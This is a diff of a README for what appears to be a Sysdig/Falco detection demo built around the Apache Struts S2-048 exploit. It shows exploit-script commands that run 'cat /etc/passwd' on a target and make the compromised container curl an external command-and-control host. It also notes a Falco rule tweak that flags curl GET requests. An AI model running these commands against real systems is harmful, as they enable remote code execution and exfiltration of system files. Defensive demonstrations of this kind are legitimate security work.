bwolmarans/struts-sysdig/README.md

 GPG_KEYS=05AB33110949707C93A279E3D3EFE6B686867BA6 07E48665A34DCAFAE522E5E6266191C37C037D42 47309207D818FFD8DCD3F83F1931D684307A10A5
 etc..

-~/apache-struts2-PoC$
-curl 127.0.0.1:8080/showcase.action -v
-#python3 -m venv .
-python exploitS2-048-cmd.py 127.0.0.1:8080 'cat /etc/passwd'

-Now, on the cc server, start some simle web server such as: python3 webserver.py

-And now, exploit!
+OK that was fun, what else can we do?
+Curl?

-`python exploitS2-048-cmd.py a31daafb811f24dc6b521914a12433e6-1984373561.us-west-2.elb.amazonaws.com:8080 'curl jumpbox.brett1.com:8080\hi_from_inside_the_container_in_our_cluster`
+`python exploitS2-048-cmd.py 12345.us-west-2.elb.amazonaws.com:8080 'curl jumpbox.brett1.com:8080\hi_from_inside_the_container_in_our_cluster`

-Now, I modified an existing Falco rule to warn on curl GET - that's right, we can get granular enough to tell the difference between a curl POST and a curl get!
+I wondered if I could modify an existing Falco rule to warn on curl GET?
+Yes!
+We can get granular enough to tell the difference between a curl POST and a curl GET that is awesome!
 So, this GET shows up on our little CC web server, and logs in Sysdig as a warning about curl, naughty, but I'll allow it, this time!

 OK now with our confidence sky high, through the roof, let's post the whole dang passwd file to our CC server here we go: